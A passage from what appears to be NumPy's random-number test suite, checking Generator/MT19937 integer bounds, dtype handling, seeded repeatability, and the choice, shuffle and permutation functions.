                          endpoint=endpoint, dtype=dt)

    def test_bounds_checking_array(self, endpoint):
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)

            assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [lbnd] * 2,
                          [ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
                          endpoint=endpoint, dtype=dt)
            assert_raises(ValueError, self.rfunc, [1] * 2, 0,
                          endpoint=endpoint, dtype=dt)

    def test_rng_zero_and_extremes(self, endpoint):
        # A single-value interval must always return that value, checked at
        # the top, bottom, and middle of each dtype's range.
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd
            is_open = not endpoint

            tgt = ubnd - 1
            assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)
            assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)

            tgt = lbnd
            assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)
            assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)

            tgt = (lbnd + ubnd) // 2
            assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
                                    endpoint=endpoint, dtype=dt), tgt)
            assert_equal(self.rfunc([tgt], [tgt + is_open],
                                    size=1000, endpoint=endpoint, dtype=dt),
                         tgt)

    def test_rng_zero_and_extremes_array(self, endpoint):
        # Array-bound variant of the test above; these calls use the
        # default half-open convention (no endpoint= passed).
        size = 1000
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            tgt = ubnd - 1
            assert_equal(self.rfunc([tgt], [tgt + 1],
                                    size=size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)

            tgt = lbnd
            assert_equal(self.rfunc([tgt], [tgt + 1],
                                    size=size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)

            tgt = (lbnd + ubnd) // 2
            assert_equal(self.rfunc([tgt], [tgt + 1],
                                    size=size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
            assert_equal(self.rfunc(
                [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)

    def test_full_range(self, endpoint):
        # Test for ticket #1690: the full dtype range must be accepted.
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            try:
                self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
            except Exception as e:
                raise AssertionError("No error should have been raised, "
                                     "but one was with the following "
                                     "message:\n\n%s" % str(e))

    def test_full_range_array(self, endpoint):
        # Test for ticket #1690 (array-valued bounds).
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            try:
                self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
            except Exception as e:
                raise AssertionError("No error should have been raised, "
                                     "but one was with the following "
                                     "message:\n\n%s" % str(e))

    def test_in_bounds_fuzz(self, endpoint):
        # Don't use fixed seed
        random = Generator(MT19937())

        for dt in self.itype[1:]:
            for ubnd in [4, 8, 16]:
                vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
                                  endpoint=endpoint, dtype=dt)
                assert_(vals.max() < ubnd)
                assert_(vals.min() >= 2)

        vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
                          dtype=bool)
        assert_(vals.max() < 2)
        assert_(vals.min() >= 0)

    def test_scalar_array_equiv(self, endpoint):
        # Scalar bounds and (broadcast) array bounds must yield identical
        # streams from identical seeds.
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            size = 1000
            random = Generator(MT19937(1234))
            scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
                                     dtype=dt)

            random = Generator(MT19937(1234))
            scalar_array = random.integers([lbnd], [ubnd], size=size,
                                           endpoint=endpoint, dtype=dt)

            random = Generator(MT19937(1234))
            array = random.integers([lbnd] * size, [ubnd] *
                                    size, size=size, endpoint=endpoint, dtype=dt)
            assert_array_equal(scalar, scalar_array)
            assert_array_equal(scalar, array)

    def test_repeatability(self, endpoint):
        # We use a sha256 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but bool, where the range
        # is [0, 2). Hashes are for little endian numbers.
        tgt = {'bool': '053594a9b82d656f967c54869bc6970aa0358cf94ad469c81478459c6a90eee3',
               'int16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4',
               'int32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b',
               'int64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1',
               'int8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1',
               'uint16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4',
               'uint32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b',
               'uint64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1',
               'uint8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1'}

        for dt in self.itype[1:]:
            random = Generator(MT19937(1234))

            # view as little endian for hash
            if sys.byteorder == 'little':
                val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
                                      dtype=dt)
            else:
                val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
                                      dtype=dt).byteswap()

            res = hashlib.sha256(val).hexdigest()
            assert_(tgt[np.dtype(dt).name] == res)

        # bools do not depend on endianness
        random = Generator(MT19937(1234))
        val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
                              dtype=bool).view(np.int8)
        res = hashlib.sha256(val).hexdigest()
        assert_(tgt[np.dtype(bool).name] == res)

    def test_repeatability_broadcasting(self, endpoint):
        # Broadcasting the bounds must not change the generated stream.
        for dt in self.itype:
            lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
            ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # view as little endian for hash
            random = Generator(MT19937(1234))
            val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
                                  dtype=dt)

            random = Generator(MT19937(1234))
            val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
                                     dtype=dt)

            assert_array_equal(val, val_bc)

            random = Generator(MT19937(1234))
            val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
                                     endpoint=endpoint, dtype=dt)

            assert_array_equal(val, val_bc)

    @pytest.mark.parametrize(
        'bound, expected',
        [(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612,
                               3769704066, 1170797179, 4108474671])),
         (2**32, np.array([517043487, 1364798666, 1733884390, 1353720613,
                           3769704067, 1170797180, 4108474672])),
         (2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
                               1831631863, 1215661561, 3869512430]))]
    )
    def test_repeatability_32bit_boundary(self, bound, expected):
        # Pin the streams for bounds just below, at, and just above 2**32,
        # where the implementation's sampling path can change.
        for size in [None, len(expected)]:
            random = Generator(MT19937(1234))
            x = random.integers(bound, size=size)
            assert_equal(x, expected if size is not None else expected[0])

    def test_repeatability_32bit_boundary_broadcasting(self):
        # Same 2**32-boundary pinning, with broadcast low/high arrays.
        desired = np.array([[[1622936284, 3620788691, 1659384060],
                             [1417365545,  760222891, 1909653332],
                             [3788118662,  660249498, 4092002593]],
                            [[3625610153, 2979601262, 3844162757],
                             [ 685800658,  120261497, 2694012896],
                             [1207779440, 1586594375, 3854335050]],
                            [[3004074748, 2310761796, 3012642217],
                             [2067714190, 2786677879, 1363865881],
                             [ 791663441, 1867303284, 2169727960]],
                            [[1939603804, 1250951100,  298950036],
                             [1040128489, 3791912209, 3317053765],
                             [3155528714,   61360675, 2305155588]],
                            [[ 817688762, 1335621943, 3288952434],
                             [1770890872, 1102951817, 1957607470],
                             [3099996017,  798043451,   48334215]]])
        for size in [None, (5, 3, 3)]:
            random = Generator(MT19937(12345))
            x = random.integers([[-1], [0], [1]],
                                [2**32 - 1, 2**32, 2**32 + 1],
                                size=size)
            assert_array_equal(x, desired if size is not None else desired[0])

    def test_int64_uint64_broadcast_exceptions(self, endpoint):
        # Broadcast bounds that overflow or invert the interval must raise,
        # for both native and object-dtype arrays.
        configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
                   np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
                              (-2**63-1, -2**63-1))}
        for dtype in configs:
            for config in configs[dtype]:
                low, high = config
                high = high - endpoint
                low_a = np.array([[low]*10])
                high_a = np.array([high] * 10)
                assert_raises(ValueError, random.integers, low, high,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low_a, high,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low, high_a,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low_a, high_a,
                              endpoint=endpoint, dtype=dtype)

                low_o = np.array([[low]*10], dtype=object)
                high_o = np.array([high] * 10, dtype=object)
                assert_raises(ValueError, random.integers, low_o, high,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low, high_o,
                              endpoint=endpoint, dtype=dtype)
                assert_raises(ValueError, random.integers, low_o, high_o,
                              endpoint=endpoint, dtype=dtype)

    def test_int64_uint64_corner_case(self, endpoint):
        # When stored in Numpy arrays, `lbnd` is casted
        # as np.int64, and `ubnd` is casted as np.uint64.
        # Checking whether `lbnd` >= `ubnd` used to be
        # done solely via direct comparison, which is incorrect
        # because when Numpy tries to compare both numbers,
        # it casts both to np.float64 because there is
        # no integer superset of np.int64 and np.uint64. However,
        # `ubnd` is too large to be represented in np.float64,
        # causing it be round down to np.iinfo(np.int64).max,
        # leading to a ValueError because `lbnd` now equals
        # the new `ubnd`.

        dt = np.int64
        tgt = np.iinfo(np.int64).max
        lbnd = np.int64(np.iinfo(np.int64).max)
        ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)

        # None of these function calls should
        # generate a ValueError now.
        actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
        assert_equal(actual, tgt)

    def test_respect_dtype_singleton(self, endpoint):
        # See gh-7203
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd
            dt = np.bool_ if dt is bool else dt

            sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
            assert_equal(sample.dtype, dt)

        for dt in (bool, int, np.compat.long):
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd

            # gh-7284: Ensure that we get Python data types
            sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
            assert not hasattr(sample, 'dtype')
            assert_equal(type(sample), dt)

    def test_respect_dtype_array(self, endpoint):
        # See gh-7203
        for dt in self.itype:
            lbnd = 0 if dt is bool else np.iinfo(dt).min
            ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
            ubnd = ubnd - 1 if endpoint else ubnd
            dt = np.bool_ if dt is bool else dt

            sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
            assert_equal(sample.dtype, dt)
            sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
                                dtype=dt)
            assert_equal(sample.dtype, dt)

    def test_zero_size(self, endpoint):
        # See gh-7203: empty output shapes are valid.
        for dt in self.itype:
            sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
            assert sample.shape == (3, 0, 4)
            assert sample.dtype == dt
            assert self.rfunc(0, -10, 0, endpoint=endpoint,
                              dtype=dt).shape == (0,)
            assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
                         (3, 0, 4))
            assert_equal(random.integers(0, -10, size=0).shape, (0,))
            assert_equal(random.integers(10, 10, size=0).shape, (0,))

    def test_error_byteorder(self):
        # Non-native byte order dtypes are rejected.
        other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
        with pytest.raises(ValueError):
            random.integers(0, 200, size=10, dtype=other_byteord_dt)

    # chi2max is the maximum acceptable chi-squared value.
    @pytest.mark.slow
    @pytest.mark.parametrize('sample_size,high,dtype,chi2max',
                             [(5000000, 5, np.int8, 125.0),        # p-value ~4.6e-25
                              (5000000, 7, np.uint8, 150.0),       # p-value ~7.7e-30
                              (10000000, 2500, np.int16, 3300.0),  # p-value ~3.0e-25
                              (50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
                              ])
    def test_integers_small_dtype_chisquared(self, sample_size, high,
                                             dtype, chi2max):
        # Regression test for gh-14774: uniformity of small-dtype sampling.
        samples = random.integers(high, size=sample_size, dtype=dtype)

        values, counts = np.unique(samples, return_counts=True)
        expected = sample_size / high
        chi2 = ((counts - expected)**2 / expected).sum()
        assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
    def setup(self):
        # Fixed seed so every test draws from the same MT19937 stream.
        # NOTE(review): nose-style `setup` is deprecated in modern pytest;
        # the supported name is `setup_method` — confirm before renaming.
        self.seed = 1234567890
    def test_integers(self):
        # Pin the signed-integer regression stream for the fixed seed.
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2))
        desired = np.array([[-80, -56], [41, 37], [-83, -16]])
        assert_array_equal(actual, desired)

    def test_integers_masked(self):
        # Test masked rejection sampling algorithm to generate array of
        # uint32 in an interval.
        random = Generator(MT19937(self.seed))
        actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
        desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
        assert_array_equal(actual, desired)

    def test_integers_closed(self):
        # endpoint=True makes the upper bound inclusive.
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
        desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
        assert_array_equal(actual, desired)

    def test_integers_max_int(self):
        # Tests whether integers with closed=True can generate the
        # maximum allowed Python int that can be converted
        # into a C long. Previous implementations of this
        # method have thrown an OverflowError when attempting
        # to generate this integer.
        actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
                                 endpoint=True)
        desired = np.iinfo('l').max
        assert_equal(actual, desired)

    def test_random(self):
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.096999199829214, 0.707517457682192],
                            [0.084364834598269, 0.767731206553125],
                            [0.665069021359413, 0.715487190596693]])
        assert_array_almost_equal(actual, desired, decimal=15)

        # A scalar draw from a fresh generator matches the first element.
        random = Generator(MT19937(self.seed))
        actual = random.random()
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)

    def test_random_float(self):
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.0969992 , 0.70751746],
                            [0.08436483, 0.76773121],
                            [0.66506902, 0.71548719]])
        assert_array_almost_equal(actual, desired, decimal=7)

    def test_random_float_scalar(self):
        # float32 output; compared at reduced (single) precision.
        random = Generator(MT19937(self.seed))
        actual = random.random(dtype=np.float32)
        desired = 0.0969992
        assert_array_almost_equal(actual, desired, decimal=7)

    def test_random_unsupported_type(self):
        # Only floating dtypes are supported by random().
        assert_raises(TypeError, random.random, dtype='int32')
    def test_choice_uniform_replace(self):
        # Uniform sampling with replacement; pinned regression values.
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4)
        desired = np.array([0, 0, 2, 2], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_nonuniform_replace(self):
        # Weighted sampling with replacement.
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
        desired = np.array([0, 1, 0, 1], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_uniform_noreplace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False)
        desired = np.array([2, 0, 3], dtype=np.int64)
        assert_array_equal(actual, desired)
        # shuffle=False with a full-size draw returns the items in order.
        actual = random.choice(4, 4, replace=False, shuffle=False)
        desired = np.arange(4, dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_nonuniform_noreplace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
        desired = np.array([0, 2, 3], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_noninteger(self):
        # choice also accepts non-numeric candidate arrays.
        random = Generator(MT19937(self.seed))
        actual = random.choice(['a', 'b', 'c', 'd'], 4)
        desired = np.array(['a', 'a', 'c', 'c'])
        assert_array_equal(actual, desired)

    def test_choice_multidimensional_default_axis(self):
        # By default rows (axis 0) of a 2-d candidate array are drawn.
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
        desired = np.array([[0, 1], [0, 1], [4, 5]])
        assert_array_equal(actual, desired)

    def test_choice_multidimensional_custom_axis(self):
        # axis=1 draws columns instead of rows.
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
        desired = np.array([[0], [2], [4], [6]])
        assert_array_equal(actual, desired)

    def test_choice_exceptions(self):
        # Invalid populations, sizes, and probability vectors all raise.
        sample = random.choice
        assert_raises(ValueError, sample, -1, 3)
        assert_raises(ValueError, sample, 3., 3)
        assert_raises(ValueError, sample, [], 3)
        assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
                      p=[[0.25, 0.25], [0.25, 0.25]])
        assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
        assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
        assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
        assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
        # gh-13087
        assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], 2,
                      replace=False, p=[1, 0, 0])

    def test_choice_return_shape(self):
        p = [0.1, 0.9]
        # Check scalar
        assert_(np.isscalar(random.choice(2, replace=True)))
        assert_(np.isscalar(random.choice(2, replace=False)))
        assert_(np.isscalar(random.choice(2, replace=True, p=p)))
        assert_(np.isscalar(random.choice(2, replace=False, p=p)))
        assert_(np.isscalar(random.choice([1, 2], replace=True)))
        assert_(random.choice([None], replace=True) is None)
        a = np.array([1, 2])
        arr = np.empty(1, dtype=object)
        arr[0] = a
        assert_(random.choice(arr, replace=True) is a)

        # Check 0-d array
        s = tuple()
        assert_(not np.isscalar(random.choice(2, s, replace=True)))
        assert_(not np.isscalar(random.choice(2, s, replace=False)))
        assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
        assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
        assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
        assert_(random.choice([None], s, replace=True).ndim == 0)
        a = np.array([1, 2])
        arr = np.empty(1, dtype=object)
        arr[0] = a
        assert_(random.choice(arr, s, replace=True).item() is a)

        # Check multi dimensional array
        s = (2, 3)
        p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
        assert_equal(random.choice(6, s, replace=True).shape, s)
        assert_equal(random.choice(6, s, replace=False).shape, s)
        assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
        assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
        assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)

        # Check zero-size
        assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
        assert_equal(random.integers(0, -10, size=0).shape, (0,))
        assert_equal(random.integers(10, 10, size=0).shape, (0,))
        assert_equal(random.choice(0, size=0).shape, (0,))
        assert_equal(random.choice([], size=(0,)).shape, (0,))
        assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
                     (3, 0, 4))
        assert_raises(ValueError, random.choice, [], 10)

    def test_choice_nan_probabilities(self):
        # None entries become NaN in the float probability vector.
        a = np.array([42, 1, 2])
        p = [None, None, None]
        assert_raises(ValueError, random.choice, a, p=p)

    def test_choice_p_non_contiguous(self):
        # Non-contiguous p must give the same stream as a contiguous copy.
        p = np.ones(10) / 5
        p[1::2] = 3.0
        random = Generator(MT19937(self.seed))
        non_contig = random.choice(5, 3, p=p[::2])
        random = Generator(MT19937(self.seed))
        contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
        assert_array_equal(non_contig, contig)

    def test_choice_return_type(self):
        # gh-9867: all integer-population code paths return int64.
        p = np.ones(4) / 4.
        actual = random.choice(4, 2)
        assert actual.dtype == np.int64
        actual = random.choice(4, 2, replace=False)
        assert actual.dtype == np.int64
        actual = random.choice(4, 2, p=p)
        assert actual.dtype == np.int64
        actual = random.choice(4, 2, p=p, replace=False)
        assert actual.dtype == np.int64

    def test_choice_large_sample(self):
        # Pin a large no-replacement draw via its sha256 hash.
        choice_hash = '4266599d12bfcfb815213303432341c06b4349f5455890446578877bb322e222'
        random = Generator(MT19937(self.seed))
        actual = random.choice(10000, 5000, replace=False)
        if sys.byteorder != 'little':
            actual = actual.byteswap()
        res = hashlib.sha256(actual.view(np.int8)).hexdigest()
        assert_(choice_hash == res)
    def test_bytes(self):
        # Pin the raw byte stream for the fixed seed.
        random = Generator(MT19937(self.seed))
        actual = random.bytes(10)
        desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
        assert_equal(actual, desired)

    def test_shuffle(self):
        # Test lists, arrays (of various dtypes), and multidimensional
        # versions of both, c-contiguous or not:
        for conv in [lambda x: np.array([]),
                     lambda x: x,
                     lambda x: np.asarray(x).astype(np.int8),
                     lambda x: np.asarray(x).astype(np.float32),
                     lambda x: np.asarray(x).astype(np.complex64),
                     lambda x: np.asarray(x).astype(object),
                     lambda x: [(i, i) for i in x],
                     lambda x: np.asarray([[i, i] for i in x]),
                     lambda x: np.vstack([x, x]).T,
                     # gh-11442
                     lambda x: (np.asarray([(i, i) for i in x],
                                           [("a", int), ("b", int)])
                                .view(np.recarray)),
                     # gh-4270
                     lambda x: np.asarray([(i, i) for i in x],
                                          [("a", object, (1,)),
                                           ("b", np.int32, (1,))])]:
            random = Generator(MT19937(self.seed))
            alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
            random.shuffle(alist)
            actual = alist
            desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
            assert_array_equal(actual, desired)

    def test_shuffle_custom_axis(self):
        # axis=1 and axis=-1 must shuffle columns identically.
        random = Generator(MT19937(self.seed))
        actual = np.arange(16).reshape((4, 4))
        random.shuffle(actual, axis=1)
        desired = np.array([[ 0,  3,  1,  2],
                            [ 4,  7,  5,  6],
                            [ 8, 11,  9, 10],
                            [12, 15, 13, 14]])
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        actual = np.arange(16).reshape((4, 4))
        random.shuffle(actual, axis=-1)
        assert_array_equal(actual, desired)

    def test_shuffle_custom_axis_empty(self):
        # Shuffling a zero-length axis is a no-op, not an error.
        random = Generator(MT19937(self.seed))
        desired = np.array([]).reshape((0, 6))
        for axis in (0, 1):
            actual = np.array([]).reshape((0, 6))
            random.shuffle(actual, axis=axis)
            assert_array_equal(actual, desired)

    def test_shuffle_axis_nonsquare(self):
        # shuffle(x, axis=1) is equivalent to shuffle(x.T).
        y1 = np.arange(20).reshape(2, 10)
        y2 = y1.copy()
        random = Generator(MT19937(self.seed))
        random.shuffle(y1, axis=1)
        random = Generator(MT19937(self.seed))
        random.shuffle(y2.T)
        assert_array_equal(y1, y2)

    def test_shuffle_masked(self):
        # gh-3263: shuffling masked arrays must preserve the multiset of
        # unmasked values.
        a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
        b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
        a_orig = a.copy()
        b_orig = b.copy()
        for i in range(50):
            random.shuffle(a)
            assert_equal(
                sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
            random.shuffle(b)
            assert_equal(
                sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))

    def test_shuffle_exceptions(self):
        # Invalid axes, non-array inputs with axis, and 0-d arrays raise.
        random = Generator(MT19937(self.seed))
        arr = np.arange(10)
        assert_raises(np.AxisError, random.shuffle, arr, 1)
        arr = np.arange(9).reshape((3, 3))
        assert_raises(np.AxisError, random.shuffle, arr, 3)
        assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
        arr = [[1, 2, 3], [4, 5, 6]]
        assert_raises(NotImplementedError, random.shuffle, arr, 1)
        arr = np.array(3)
        assert_raises(TypeError, random.shuffle, arr)
        arr = np.ones((3, 2))
        assert_raises(np.AxisError, random.shuffle, arr, 2)
    def test_permutation(self):
        # permutation() must match shuffle()'s stream; also checks 2-d
        # input, invalid types, and the integer-argument form.
        random = Generator(MT19937(self.seed))
        alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
        actual = random.permutation(alist)
        desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
        assert_array_equal(actual, desired)

        random = Generator(MT19937(self.seed))
        arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
        actual = random.permutation(arr_2d)
        assert_array_equal(actual, np.atleast_2d(desired).T)

        bad_x_str = "abcd"
        assert_raises(np.AxisError, random.permutation, bad_x_str)

        bad_x_float = 1.2
        assert_raises(np.AxisError, random.permutation, bad_x_float)

        # An integer n is treated as arange(n).
        random = Generator(MT19937(self.seed))
        integer_val = 10
        desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
        actual = random.permutation(integer_val)
        assert_array_equal(actual, desired)

    def test_permutation_custom_axis(self):
        # axis=1 and axis=-1 must permute columns identically.
        a = np.arange(16).reshape((4, 4))
        desired = np.array([[ 0,  3,  1,  2],
                            [ 4,  7,  5,  6],
                            [ 8, 11,  9, 10],
                            [12, 15, 13, 14]])
        random = Generator(MT19937(self.seed))
        actual = random.permutation(a, axis=1)
        assert_array_equal(actual, desired)
        random = Generator(MT19937(self.seed))
        actual = random.permutation(a, axis=-1)
        assert_array_equal(actual, desired)

    def test_permutation_exceptions(self):
        # Out-of-range or non-integer axes raise.
        random = Generator(MT19937(self.seed))
        arr = np.arange(10)
        assert_raises(np.AxisError, random.permutation, arr, 1)
        arr = np.arange(9).reshape((3, 3))
        assert_raises(np.AxisError, random.permutation, arr, 3)
        assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))

    @pytest.mark.parametrize("dtype", [int, object])
    @pytest.mark.parametrize("axis, expected",
                             [(None, np.array([[3, 7, 0, 9, 10, 11],
                                               [8, 4, 2, 5, 1, 6]])),
                              (0, np.array([[6, 1, 2, 9, 10, 11],
                                            [0, 7, 8, 3, 4, 5]])),
                              (1, np.array([[ 5,  3,  4,  0,  2,  1],
                                            [11,  9, 10,  6,  8,  7]]))])
    def test_permuted(self, dtype, axis, expected):
        # permuted() must support in-place (out=x) and out-of-place use
        # with identical results and preserved dtype.
        random = Generator(MT19937(self.seed))
        x = np.arange(12).reshape(2, 6).astype(dtype)
        random.permuted(x, axis=axis, out=x)
        assert_array_equal(x, expected)

        random = Generator(MT19937(self.seed))
        x = np.arange(12).reshape(2, 6).astype(dtype)
        y = random.permuted(x, axis=axis)
        assert y.dtype == dtype
        assert_array_equal(y, expected)

    def test_permuted_with_strides(self):
        # A strided view passed as out must update the base array in place.
        random = Generator(MT19937(self.seed))
        x0 = np.arange(22).reshape(2, 11)
        x1 = x0.copy()
        x = x0[:, ::3]
        y = random.permuted(x, axis=1, out=x)
        expected = np.array([[ 0,  9,  3,  6],
                             [14, 20, 11, 17]])
        assert_array_equal(y, expected)
        x1[:, ::3] = expected
        # Verify that the original x0 was modified in-place as expected.
        assert_array_equal(x1, x0)

    def test_permuted_empty(self):
        # Empty input yields empty output without error.
        y = random.permuted([])
        assert_array_equal(y, [])

    @pytest.mark.parametrize('outshape', [(2, 3), 5])
    def test_permuted_out_with_wrong_shape(self, outshape):
        # A mismatched out shape raises ValueError.
        a = np.array([1, 2, 3])
